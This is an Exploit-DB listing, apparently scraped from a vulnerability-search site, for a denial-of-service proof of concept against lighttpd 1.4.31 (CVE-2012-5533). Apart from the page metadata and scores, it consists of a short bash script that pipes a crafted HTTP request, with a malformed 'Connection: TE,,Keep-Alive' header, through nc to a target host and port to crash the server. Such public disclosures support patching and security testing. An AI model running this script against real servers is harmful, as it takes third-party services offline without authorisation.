Lucene search

K
exploitdbT4cEDB-ID:22902
HistoryNov 22, 2012 - 12:00 a.m.

lighttpd 1.4.31 - Denial of Service (PoC)

2012-11-2200:00:00
t4c
www.exploit-db.com
171

9.5 High

AI Score

Confidence

High

0.711 High

EPSS

Percentile

98.0%

#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: [email protected]
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
	echo "usage :$0 <Host/IP> <Port>"
else
	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi